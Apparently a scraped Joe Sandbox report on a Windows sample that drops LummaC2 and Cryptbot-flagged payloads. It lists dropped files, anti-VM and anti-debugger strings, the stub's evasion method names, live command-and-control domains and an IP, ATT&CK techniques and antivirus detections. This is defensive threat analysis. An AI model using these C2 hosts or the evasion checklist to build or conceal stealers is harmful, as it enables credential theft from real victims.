      Source: Set-up.exe.0.drStatic PE information: section name: .eh_fram
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 2_2_00E2616A push edx; ret 2_2_00E2616B
      Source: C:\Users\user\AppData\Local\Temp\Set-up.exeCode function: 3_3_00C368CB push ecx; ret 3_3_00C3693A
      Source: C:\Users\user\AppData\Local\Temp\Set-up.exeCode function: 3_3_00C368CB push ecx; ret 3_3_00C3693A
      Source: C:\Users\user\AppData\Local\Temp\Set-up.exeCode function: 3_3_00C32CD5 push 2BE400BFh; ret 3_3_00C32CE2
      Source: C:\Users\user\AppData\Local\Temp\Set-up.exeCode function: 3_3_00C35084 push ecx; ret 3_3_00C35086
      Source: C:\Users\user\AppData\Local\Temp\Set-up.exeCode function: 3_3_00C35084 push ecx; ret 3_3_00C35086
      Source: C:\Users\user\AppData\Local\Temp\Set-up.exeCode function: 3_3_00C3684F push edi; ret 3_3_00C36852
      Source: C:\Users\user\AppData\Local\Temp\Set-up.exeCode function: 3_3_00C3684F push edi; ret 3_3_00C36852
      Source: C:\Users\user\AppData\Local\Temp\Set-up.exeCode function: 3_3_00C3D005 push ss; retn 0000h3_3_00C3D006
      Source: C:\Users\user\AppData\Local\Temp\Set-up.exeCode function: 3_3_00C3D005 push ss; retn 0000h3_3_00C3D006
      Source: C:\Users\user\AppData\Local\Temp\Set-up.exeCode function: 3_3_00C3D005 push ss; retn 0000h3_3_00C3D006
      Source: C:\Users\user\AppData\Local\Temp\Set-up.exeCode function: 3_3_00C3D005 push ss; retn 0000h3_3_00C3D006
      Source: C:\Users\user\AppData\Local\Temp\Set-up.exeCode function: 3_3_00C3E014 push ds; retn 0000h3_3_00C3E022
      Source: C:\Users\user\AppData\Local\Temp\Set-up.exeCode function: 3_3_00C3E014 push ds; retn 0000h3_3_00C3E022
      Source: C:\Users\user\AppData\Local\Temp\Set-up.exeCode function: 3_3_00C3E014 push ds; retn 0000h3_3_00C3E022
      Source: C:\Users\user\AppData\Local\Temp\Set-up.exeCode function: 3_3_00C3E014 push ds; retn 0000h3_3_00C3E022
      Source: C:\Users\user\AppData\Local\Temp\Set-up.exeCode function: 3_3_00C3E014 push ds; retn 0000h3_3_00C3E022
      Source: C:\Users\user\AppData\Local\Temp\Set-up.exeCode function: 3_3_00C3E014 push ds; retn 0000h3_3_00C3E022
      Source: C:\Users\user\AppData\Local\Temp\Set-up.exeCode function: 3_3_00C351CC push edx; ret 3_3_00C351CE
      Source: C:\Users\user\AppData\Local\Temp\Set-up.exeCode function: 3_3_00C351CC push edx; ret 3_3_00C351CE
      Source: C:\Users\user\AppData\Local\Temp\Set-up.exeCode function: 3_3_00C31DDD push ds; ret 3_3_00C31DDE
      Source: C:\Users\user\AppData\Local\Temp\Set-up.exeCode function: 3_3_00C30584 push es; ret 3_3_00C30586
      Source: C:\Users\user\AppData\Local\Temp\Set-up.exeCode function: 3_3_00C36D9F pushad ; ret 3_3_00C36DA2
      Source: C:\Users\user\AppData\Local\Temp\Set-up.exeCode function: 3_3_00C36D9F pushad ; ret 3_3_00C36DA2
      Source: C:\Users\user\AppData\Local\Temp\Set-up.exeCode function: 3_3_00C355A5 push esi; ret 3_3_00C355A6
      Source: C:\Users\user\AppData\Local\Temp\Set-up.exeCode function: 3_3_00C355A5 push esi; ret 3_3_00C355A6
      Source: C:\Users\user\AppData\Local\Temp\Set-up.exeCode function: 3_3_00C36941 push eax; ret 3_3_00C36942
      Source: C:\Users\user\AppData\Local\Temp\Set-up.exeCode function: 3_3_00C36941 push eax; ret 3_3_00C36942
      Source: C:\Users\user\AppData\Local\Temp\Set-up.exeCode function: 3_3_00C35548 push esp; ret 3_3_00C3554A
      Source: C:\Users\user\AppData\Local\Temp\Set-up.exeCode function: 3_3_00C35548 push esp; ret 3_3_00C3554A
      Source: C:\Users\user\AppData\Local\Temp\Set-up.exeCode function: 3_3_00C3955C pushad ; ret 3_3_00C3955D
      Source: C:\Users\user\Desktop\jo0PnKm2Lg.exeFile created: C:\Users\user\AppData\Local\Temp\LummaC2.exeJump to dropped file
      Source: C:\Users\user\Desktop\jo0PnKm2Lg.exeFile created: C:\Users\user\AppData\Local\Temp\Set-up.exeJump to dropped file
      Source: C:\Users\user\Desktop\jo0PnKm2Lg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\jo0PnKm2Lg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\jo0PnKm2Lg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\jo0PnKm2Lg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\jo0PnKm2Lg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\jo0PnKm2Lg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\jo0PnKm2Lg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\jo0PnKm2Lg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\jo0PnKm2Lg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\jo0PnKm2Lg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\jo0PnKm2Lg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\jo0PnKm2Lg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\jo0PnKm2Lg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\jo0PnKm2Lg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\jo0PnKm2Lg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\jo0PnKm2Lg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

      Malware Analysis System Evasion

      barindex
      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
      Source: jo0PnKm2Lg.exe, 00000000.00000002.2190186168.0000000005347000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, Set-up.exe, 00000003.00000000.2188172303.0000000001570000.00000002.00000001.01000000.00000007.sdmp, Set-up.exe.0.drBinary or memory string: PROCMON.EXE
      Source: jo0PnKm2Lg.exe, 00000000.00000002.2190186168.0000000005347000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, Set-up.exe, 00000003.00000000.2188172303.0000000001570000.00000002.00000001.01000000.00000007.sdmp, Set-up.exe.0.drBinary or memory string: X64DBG.EXE
      Source: jo0PnKm2Lg.exeBinary or memory string: SBIEDLL.DLL
      Source: jo0PnKm2Lg.exe, 00000000.00000002.2190186168.0000000005347000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, Set-up.exe, 00000003.00000000.2188172303.0000000001570000.00000002.00000001.01000000.00000007.sdmp, Set-up.exe.0.drBinary or memory string: WINDBG.EXE
      Source: Set-up.exe.0.drBinary or memory string: SYSINTERNALSNUM_PROCESSORNUM_RAMNAMEALLFREEDRIVERSNUM_DISPLAYSRESOLUTION_XRESOLUTION_Y\*RECENT_FILESPROCESSESUPTIME_MINUTESC:\WINDOWS\SYSTEM32\VBOX*.DLL01VBOX_FIRSTSYSTEM\CONTROLSET001\SERVICES\VBOXSFVBOX_SECONDC:\USERS\PUBLIC\PUBLIC_CHECKWINDBG.EXEDBGWIRESHARK.EXEPROCMON.EXEX64DBG.EXEIDA.EXEDBG_SECDBG_THIRDYADROINSTALLED_APPSSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALLSOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL%D%S\%SDISPLAYNAMEAPP_NAMEINDEXCREATETOOLHELP32SNAPSHOT FAILED.
      Source: jo0PnKm2Lg.exe, 00000000.00000002.2190186168.0000000005347000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, Set-up.exe, 00000003.00000000.2188172303.0000000001570000.00000002.00000001.01000000.00000007.sdmp, Set-up.exe.0.drBinary or memory string: WIRESHARK.EXE
      Source: C:\Users\user\Desktop\jo0PnKm2Lg.exeMemory allocated: 18A0000 memory reserve | memory write watchJump to behavior
      Source: C:\Users\user\Desktop\jo0PnKm2Lg.exeMemory allocated: 3520000 memory reserve | memory write watchJump to behavior
      Source: C:\Users\user\Desktop\jo0PnKm2Lg.exeMemory allocated: 3280000 memory reserve | memory write watchJump to behavior
      Source: C:\Users\user\Desktop\jo0PnKm2Lg.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeAPI coverage: 7.1 %
      Source: C:\Users\user\Desktop\jo0PnKm2Lg.exe TID: 3732Thread sleep time: -922337203685477s >= -30000sJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Set-up.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
      Source: C:\Users\user\Desktop\jo0PnKm2Lg.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: Set-up.exe.0.drBinary or memory string: SYSTEM\ControlSet001\Services\VBoxSF
      Source: jo0PnKm2Lg.exeBinary or memory string: vmware
      Source: jo0PnKm2Lg.exeBinary or memory string: <Module>Set-up.exeProgramStubWriterRunnerRunTimeAntiAntismscorlibSystemObjectdelaydelayTimeantiVMantiSandboxantiDebugantiEmulatorenablePersistenceenableFakeErrorencryptTypecompressedcversSystem.Collections.GenericList`1fileNamesfileTypesfileRunTypesfileDropPathsMainDecompressEncryptOrDecryptXORDecryptEncryptInitalizeIEnumerable`1EncryptOutputSwapGetResourceRunOnStartup.ctorWriteAllBytesExecuteDetectVirtualMachineGetModuleHandleDetectSandboxieCheckRemoteDebuggerPresentDetectDebuggerCheckEmulatordatatextkeysijfileregNameAppPathHidefileBytesfinalPathpathrunTypelpModuleNamehProcessisDebuggerPresentSystem.ReflectionAssemblyTitleAttributeAssemblyDescriptionAttributeAssemblyCompanyAttributeAssemblyProductAttributeAssemblyCopyrightAttributeAssemblyTrademarkAttributeAssemblyFileVersionAttributeAssemblyVersionAttributeSystem.Runtime.InteropServicesComVisibleAttributeGuidAttributeSystem.Runtime.CompilerServicesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSet-upEnvironmentExitSystem.ThreadingThreadSleepget_ItemStringop_EqualitySystem.TextEncodingget_UnicodeGetBytesConcatSystem.IOPathCombineget_CountMemoryStreamSystem.IO.CompressionDeflateStreamStreamCompressionModeCopyToIDisposableDisposeToArrayByteSystem.CoreSystem.LinqEnumerable<EncryptInitalize>b__0Func`2CS$<>9__CachedAnonymousMethodDelegate1CompilerGeneratedAttributeRangeSelect<>c__DisplayClass3<EncryptOutput>b__2bAssemblyGetExecutingAssemblySystem.ResourcesResourceManagerGetObjectAppDomainget_CurrentDomainget_FriendlyNameFileExistsGetEntryAssemblyget_Locationop_InequalityCopyFileAttributesGetAttributesSetAttributesMicrosoft.Win32RegistryRegistryKeyLocalMachineget_UTF8GetStringOpenSubKeySetValueCurrentUserException.cctorConvertFromBase64StringAddGetTempPathSystem.DiagnosticsProcessProcessStartInfoget_StartInfoset_FileNameStartSystem.ManagementManagementObjectSearcherManagementObjectCollectionGetManagementObjectEnumeratorGetEnumeratorManagementBaseObjectget_CurrentToStringToLowerToUpperInvariantContainsMoveNextDllImportAttributekernel32.dllIntPtrToInt32GetCurrentProcessget_HandleDateTimeget_Nowget_Ticksbixauhucnaw.resources
      Source: Set-up.exe, 00000003.00000003.2202650165.0000000000BE3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllTT)
      Source: Set-up.exeBinary or memory string: Hyper-V RAW
      Source: jo0PnKm2Lg.exeBinary or memory string: DetectVirtualMachine
      Source: Set-up.exe.0.drBinary or memory string: SYSINTERNALSNum_processorNum_ramnameallfreedriversNum_displaysresolution_xresolution_y\*recent_filesprocessesuptime_minutesC:\Windows\System32\VBox*.dll01vbox_firstSYSTEM\ControlSet001\Services\VBoxSFvbox_secondC:\USERS\PUBLIC\public_checkWINDBG.EXEdbgwireshark.exeprocmon.exex64dbg.exeida.exedbg_secdbg_thirdyadroinstalled_appsSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallSOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall%d%s\%sDisplayNameapp_nameindexCreateToolhelp32Snapshot failed.
      Source: Set-up.exe, 00000003.00000003.2203504484.0000000000AE7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Y\MACHINE\SYSTEM\ControlSet001\Services\VBoxSFsion\Uninstall\{90160000-008C-0000-0000-0000000FF1CE}00000FF1CE}\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0000-0000-0000000FF1CE}
      Source: Set-up.exe, 00000003.00000003.2290027870.0000000000C33000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000003.2289789125.0000000000C2E000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000003.2290098678.0000000000C38000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000002.2291369007.0000000000C3E000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000003.2290126041.0000000000C3C000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000003.00000003.2290603374.0000000000C3E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll,
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeAPI call chain: ExitProcess graph end nodegraph_2-14167
      Source: C:\Users\user\AppData\Local\Temp\Set-up.exeProcess information queried: ProcessInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\LummaC2.exeCode function: 2_2_00E323F0 LdrInitializeThunk,2_2_00E323F0
      Source: C:\Users\user\Desktop\jo0PnKm2Lg.exeMemory allocated: page read and write | page guardJump to behavior

      HIPS / PFW / Operating System Protection Evasion

      barindex
      LummaC encrypted strings found
      Source: jo0PnKm2Lg.exe, 00000000.00000002.2190186168.0000000004525000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: cloudewahsj.shop
      Source: jo0PnKm2Lg.exe, 00000000.00000002.2190186168.0000000004525000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: rabidcowse.shop
      Source: jo0PnKm2Lg.exe, 00000000.00000002.2190186168.0000000004525000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: noisycuttej.shop
      Source: jo0PnKm2Lg.exe, 00000000.00000002.2190186168.0000000004525000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: tirepublicerj.shop
      Source: jo0PnKm2Lg.exe, 00000000.00000002.2190186168.0000000004525000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: framekgirus.shop
      Source: jo0PnKm2Lg.exe, 00000000.00000002.2190186168.0000000004525000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: wholersorie.shop
      Source: jo0PnKm2Lg.exe, 00000000.00000002.2190186168.0000000004525000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: abruptyopsn.shop
      Source: jo0PnKm2Lg.exe, 00000000.00000002.2190186168.0000000004525000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: nearycrepso.shop
      Source: jo0PnKm2Lg.exe, 00000000.00000002.2190186168.0000000004525000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: berserkyfir.click
      Source: C:\Users\user\Desktop\jo0PnKm2Lg.exeProcess created: C:\Users\user\AppData\Local\Temp\LummaC2.exe "C:\Users\user\AppData\Local\Temp\LummaC2.exe" Jump to behavior
      Source: C:\Users\user\Desktop\jo0PnKm2Lg.exeProcess created: C:\Users\user\AppData\Local\Temp\Set-up.exe "C:\Users\user\AppData\Local\Temp\Set-up.exe" Jump to behavior
      Source: C:\Users\user\Desktop\jo0PnKm2Lg.exeQueries volume information: C:\Users\user\Desktop\jo0PnKm2Lg.exe VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Set-up.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Set-up.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Set-up.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Set-up.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Set-up.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
      Source: jo0PnKm2Lg.exe, 00000000.00000002.2190186168.0000000005347000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, Set-up.exe, 00000003.00000000.2188172303.0000000001570000.00000002.00000001.01000000.00000007.sdmp, Set-up.exe.0.drBinary or memory string: procmon.exe
      Source: jo0PnKm2Lg.exe, 00000000.00000002.2190186168.0000000005347000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, Set-up.exe, 00000003.00000000.2188172303.0000000001570000.00000002.00000001.01000000.00000007.sdmp, Set-up.exe.0.drBinary or memory string: wireshark.exe

      Stealing of Sensitive Information

      barindex
      Yara detected Cryptbot
      Source: Yara matchFile source: Process Memory Space: Set-up.exe PID: 3128, type: MEMORYSTR
      Yara detected LummaC Stealer
      Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
      Leaks process information
      Source: global trafficTCP traffic: 192.168.2.5:49723 -> 176.53.147.104:80

      Remote Access Functionality

      barindex
      Yara detected Cryptbot
      Source: Yara matchFile source: Process Memory Space: Set-up.exe PID: 3128, type: MEMORYSTR
      Yara detected LummaC Stealer
      Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR

      Mitre Att&ck Matrix

      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
      PowerShell      		1
      DLL Side-Loading      		11
      Process Injection      		1
      Masquerading      		OS Credential Dumping211
      Security Software Discovery      		Remote Services1
      Screen Capture      		11
      Encrypted Channel      		Exfiltration Over Other Network MediumAbuse Accessibility Features
      CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
      DLL Side-Loading      		1
      Disable or Modify Tools      		LSASS Memory11
      Process Discovery      		Remote Desktop Protocol11
      Archive Collected Data      		3
      Ingress Tool Transfer      		Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)31
      Virtualization/Sandbox Evasion      		Security Account Manager31
      Virtualization/Sandbox Evasion      		SMB/Windows Admin Shares2
      Clipboard Data      		4
      Non-Application Layer Protocol      		Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
      Process Injection      		NTDS1
      Remote System Discovery      		Distributed Component Object ModelInput Capture15
      Application Layer Protocol      		Traffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
      Deobfuscate/Decode Files or Information      		LSA Secrets1
      File and Directory Discovery      		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
      Obfuscated Files or Information      		Cached Domain Credentials13
      System Information Discovery      		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
      DLL Side-Loading      		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      jo0PnKm2Lg.exe76%ReversingLabsByteCode-MSIL.Trojan.Jalapeno
      jo0PnKm2Lg.exe69%VirustotalBrowse
      jo0PnKm2Lg.exe100%AviraHEUR/AGEN.1357339
      jo0PnKm2Lg.exe100%Joe Sandbox ML

      Dropped Files

      SourceDetectionScannerLabelLink
      C:\Users\user\AppData\Local\Temp\LummaC2.exe100%Joe Sandbox ML
      C:\Users\user\AppData\Local\Temp\LummaC2.exe68%ReversingLabsWin32.Trojan.LummaStealer
      C:\Users\user\AppData\Local\Temp\Set-up.exe75%ReversingLabsWin32.Trojan.Amadey

      Unpacked PE Files

      No Antivirus matches

      Domains

      No Antivirus matches

      URLs

      SourceDetectionScannerLabelLink
      gPhome.twelve12vs.top100%Avira URL Cloudmalware
      berserkyfir.click100%Avira URL Cloudmalware
      twelve12vse12vs.top0%Avira URL Cloudsafe
      twelve12vs.top.top0%Avira URL Cloudsafe
      twelve12vs.top100%Avira URL Cloudmalware
      a.dnspod.comvs.top0%Avira URL Cloudsafe
      home.twelve12vs.top100%Avira URL Cloudmalware

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      bg.microsoft.map.fastly.net
      		199.232.210.172
      		truefalse
        		high
        home.twelve12vs.top
        		176.53.147.104
        		truetrue
          		unknown
          httpbin.org
          		3.210.94.60
          		truefalse
            		high

            Contacted URLs

            NameMaliciousAntivirus DetectionReputation
            cloudewahsj.shopfalse
              		high
              noisycuttej.shopfalse
                		high
                berserkyfir.clicktrue
                • Avira URL Cloud: malware
                		unknown
                nearycrepso.shopfalse
                  		high
                  rabidcowse.shopfalse
                    		high
                    gPhome.twelve12vs.toptrue
                    • Avira URL Cloud: malware
                    		unknown
                    wholersorie.shopfalse
                      		high
                      twelve12vse12vs.toptrue
                      • Avira URL Cloud: safe
                      		unknown
                      twelve12vs.top.toptrue
                      • Avira URL Cloud: safe
                      		unknown
                      twelve12vs.toptrue
                      • Avira URL Cloud: malware
                      		unknown
                      framekgirus.shopfalse
                        		high
                        a.dnspod.comvs.toptrue
                        • Avira URL Cloud: safe
                        		unknown
                        https://httpbin.org/ipfalse
                          		high
                          home.twelve12vs.toptrue
                          • Avira URL Cloud: malware
                          		unknown
                          tirepublicerj.shopfalse
                            		high
                            abruptyopsn.shopfalse
                              		high

                              URLs from Memory and Binaries

                              NameSourceMaliciousAntivirus DetectionReputation
                              https://curl.se/docs/hsts.htmlSet-up.exe.0.drfalse
                                		high
                                http://html4/loose.dtdjo0PnKm2Lg.exe, 00000000.00000002.2190186168.0000000005347000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000003.00000000.2188172303.0000000001570000.00000002.00000001.01000000.00000007.sdmp, Set-up.exe.0.drfalse
                                  		high
                                  https://httpbin.org/ipbeforejo0PnKm2Lg.exe, 00000000.00000002.2190186168.0000000005347000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000003.00000000.2188172303.0000000001570000.00000002.00000001.01000000.00000007.sdmp, Set-up.exe.0.drfalse
                                    		high
                                    https://curl.se/docs/http-cookies.htmljo0PnKm2Lg.exe, 00000000.00000002.2190186168.0000000005347000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000003.00000000.2188172303.0000000001570000.00000002.00000001.01000000.00000007.sdmp, Set-up.exe.0.drfalse
                                      		high
                                      https://curl.se/docs/alt-svc.htmlSet-up.exe.0.drfalse
                                        		high
                                        http://.cssjo0PnKm2Lg.exe, 00000000.00000002.2190186168.0000000005347000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000003.00000000.2188172303.0000000001570000.00000002.00000001.01000000.00000007.sdmp, Set-up.exe.0.drfalse
                                          		high
                                          http://.jpgjo0PnKm2Lg.exe, 00000000.00000002.2190186168.0000000005347000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000003.00000000.2188172303.0000000001570000.00000002.00000001.01000000.00000007.sdmp, Set-up.exe.0.drfalse
                                            		high

                                            World Map of Contacted IPs

                                            • No. of IPs < 25%
                                            • 25% < No. of IPs < 50%
                                            • 50% < No. of IPs < 75%
                                            • 75% < No. of IPs

                                            Public IPs

                                            IPDomainCountryFlagASNASN NameMalicious
                                            176.53.147.104
                                            		home.twelve12vs.topUnited Kingdom
                                            		35791VANNINVENTURESGBtrue
                                            3.210.94.60
                                            		httpbin.orgUnited States
                                            		14618AMAZON-AESUSfalse

                                            General Information

                                            Joe Sandbox version:42.0.0 Malachite
                                            Analysis ID:1589511
                                            Start date and time:2025-01-12 17:44:13 +01:00
                                            Joe Sandbox product:CloudBasic
                                            Overall analysis duration:0h 6m 7s
                                            Hypervisor based Inspection enabled:false
                                            Report type:full
                                            Cookbook file name:default.jbs
                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                            Number of analysed new started processes analysed:6
                                            Number of new started drivers analysed:0
                                            Number of existing processes analysed:0
                                            Number of existing drivers analysed:0
                                            Number of injected processes analysed:0
                                            Technologies:
                                            • HCA enabled
                                            • EGA enabled
                                            • AMSI enabled
                                            Analysis Mode:default
                                            Analysis stop reason:Timeout
                                            Sample name:jo0PnKm2Lg.exe
                                            renamed because original name is a hash value
                                            Original Sample Name:8398fc4aa3a5a5ab6ae7ed394b449d0a.exe
                                            Detection:MAL
                                            Classification:mal100.troj.evad.winEXE@5/3@8/2
                                            EGA Information:
                                            • Successful, ratio: 33.3%
                                            HCA Information:Failed
                                            Cookbook Comments:
                                            • Found application associated with file extension: .exe

                                            Warnings

                                            • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                            • Excluded IPs from analysis (whitelisted): 20.190.159.73, 20.190.159.23, 20.190.159.0, 20.190.159.71, 40.126.31.73, 20.190.159.4, 40.126.31.69, 20.190.159.75, 13.107.246.45, 20.109.210.53, 23.1.237.91
                                            • Excluded domains from analysis (whitelisted): www.bing.com, client.wns.windows.com, prdv4a.aadg.msidentity.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, www.tm.v4.a.prd.aadg.trafficmanager.net, ctldl.windowsupdate.com, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, ocsp.digicert.com, login.live.com, wu-b-net.trafficmanager.net, www.tm.lg.prod.aadmsa.trafficmanager.net
                                            • Execution Graph export aborted for target Set-up.exe, PID 3128 because there are no executed function
                                            • Execution Graph export aborted for target jo0PnKm2Lg.exe, PID 3580 because it is empty
                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                            • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                            Simulations

                                            Behavior and APIs

                                            No simulations

                                            Joe Sandbox View / Context

                                            IPs

                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            176.53.147.104FYQ6Ee6gbS.exeGet hashmaliciousCryptbotBrowse
                                            • home.fivetj5vs.top/enQdvpMCNJgKflSEBdde1736138767

                                            Domains

                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            bg.microsoft.map.fastly.netAxion.exeGet hashmaliciousSheetRatBrowse
                                            • 199.232.210.172
                                            eufS6WOuOx.exeGet hashmaliciousDCRatBrowse
                                            • 199.232.214.172
                                            hgTNnG8vjD.exeGet hashmaliciousDarkCometBrowse
                                            • 199.232.210.172
                                            https://pub-ce1f93897bdf44e9b1cd99ad0325c570.r2.dev/index.htmlGet hashmaliciousHTMLPhisherBrowse
                                            • 199.232.210.172
                                            281388015101323984.jsGet hashmaliciousStrela DownloaderBrowse
                                            • 199.232.210.172
                                            305861283730376077.jsGet hashmaliciousStrela DownloaderBrowse
                                            • 199.232.214.172
                                            14444181562539231561.jsGet hashmaliciousStrela DownloaderBrowse
                                            • 199.232.210.172
                                            733422181158883785.jsGet hashmaliciousStrela DownloaderBrowse
                                            • 199.232.210.172
                                            2836992752554325080.jsGet hashmaliciousStrela DownloaderBrowse
                                            • 199.232.210.172
                                            1274320496157183071.jsGet hashmaliciousStrela DownloaderBrowse
                                            • 199.232.214.172
                                            httpbin.orgFYQ6Ee6gbS.exeGet hashmaliciousCryptbotBrowse
                                            • 50.19.58.113
                                            Set-up.exeGet hashmaliciousCryptbotBrowse
                                            • 50.19.58.113
                                            Set-up.exeGet hashmaliciousCryptbotBrowse
                                            • 50.19.58.113
                                            Set-up.exeGet hashmaliciousCryptbotBrowse
                                            • 50.19.58.113
                                            ebjtOH70jl.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                            • 34.197.122.172
                                            random(3).exeGet hashmaliciousCryptbotBrowse
                                            • 34.200.57.114
                                            random(5).exeGet hashmaliciousCryptbotBrowse
                                            • 34.200.57.114
                                            Set-up.exeGet hashmaliciousUnknownBrowse
                                            • 34.200.57.114
                                            Set-up.exeGet hashmaliciousUnknownBrowse
                                            • 34.200.57.114
                                            TX5LAYBZRI.exeGet hashmaliciousUnknownBrowse
                                            • 34.200.57.114

